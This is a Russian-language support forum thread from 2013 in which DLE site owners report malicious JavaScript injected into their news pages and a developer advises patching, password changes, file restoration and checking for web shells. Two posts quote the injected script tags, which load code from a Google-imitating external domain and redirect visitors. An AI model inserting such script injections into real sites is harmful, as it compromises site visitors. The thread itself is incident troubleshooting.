qpool 0 Опубликовано: 30 сентября 2013 Рассказать Опубликовано: 30 сентября 2013 (изменено) Сегоня обнаружил в нвоостях вот такую шляпу она теперь делает редирект на порно сайт <script type="text/javascript" async="async" src="http://google-statistics.ru/js/ada67ce42f7e51433fdc45e523f90ff7.js"></script> и она не во всех новостях! Изменено 30 сентября 2013 пользователем qpool Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 30 сентября 2013 Рассказать Опубликовано: 30 сентября 2013 qpool, Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта. Цитата Ссылка на сообщение Поделиться на других сайтах
qpool 0 Опубликовано: 30 сентября 2013 Рассказать Опубликовано: 30 сентября 2013 qpool, Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта. заплатку поставил! новости все вычистил потому что скрипт то новый какой то ! пароли поменял вообще все на доступ VPS к базе , в админке все сменил везде разные! достали эти скрипты )) Цитата Ссылка на сообщение Поделиться на других сайтах
cereal005 0 Опубликовано: 4 октября 2013 Рассказать Опубликовано: 4 октября 2013 (изменено) Произошла подобная проблема. Во все статьи вставили подобные вставки: <script async="async" type="text/javascript" src="http://google-statistics.ru/js/d072677d210ac4c03ba046120f0802ec.js"></script> На одном и том же сервере, почему-то затронуло не все сайты, а некоторые. Может просто до них еще не добрались) Везде поставил заплатку, почистил новости, поменял пароли. Надеюсь поможет. Кстати, после перестроения новостей javascript удаляется из новостей, но он остается в статических страницах. Будьте внимательны и делайте перестроение стат. страниц тоже. Изменено 4 октября 2013 пользователем Aлександp Цитата Ссылка на сообщение Поделиться на других сайтах
chelnovosti_ru 2 Опубликовано: 10 октября 2013 Рассказать Опубликовано: 10 октября 2013 (изменено) Celsoft, я уже в 4 раз меняю все пароли, phpmyadmin в открытом доступе, ссылка на вход не стандарт, переделана! Также мой системный администратор сказал, что подборов паролей не было к phpmyadmin, сказал что 100% уязвимость в самом движке DLE. Изменено 10 октября 2013 пользователем chelnovosti_ru Цитата Ссылка на сообщение Поделиться на других сайтах
chelnovosti_ru 2 Опубликовано: 10 октября 2013 Рассказать Опубликовано: 10 октября 2013 Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код((( Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код((( После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно. Цитата Ссылка на сообщение Поделиться на других сайтах
chelnovosti_ru 2 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код((( После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно. Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE(((( Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE(((( Добавить JS код в новости через DLE невозможно, только напрямую в БД или минуя DLE через другие скрипты. Соответственно злоумышленник либо имеет прямой доступ к вашему аккаунту, а это не только пароли к БД, а например к хостингу, либо на вашем сервере есть шелл. Других вариантов нет. Шелл может быть не в отдельных файлах, а например встроен во внутренние файлы DLE. Поэтому полностью восстановите оригинальные файлы скрипта на сервере, убедитесь что патч действительно стоит, и смените все пароли, от БД, хостинга, админпанели DLE, FTP и т.д. Если на сервере несколько сайтов, то соответственно проделать все для всех сайтов. Цитата Ссылка на сообщение Поделиться на других сайтах
chelnovosti_ru 2 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 Что касается файлов, буквально вчера вечером перезалил архив версии 9.7 чистую, установил заплатку, и один фиг ломанули( Паролик к хостинг панели сменил, фтп пароль сменил, к базе сменил, везде 20-ти значный, однако, сегодня злоумышленник пытался пробраться в БД, спаслись тем, что сис админ сделал вход в БД только по моему ип адресу. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 095 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 chelnovosti_ru, Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили? Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло. Цитата Ссылка на сообщение Поделиться на других сайтах
chelnovosti_ru 2 Опубликовано: 11 октября 2013 Рассказать Опубликовано: 11 октября 2013 chelnovosti_ru, Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили? Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло. Отправил вам сообщения со всем данными для входа, которые вы просили. Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.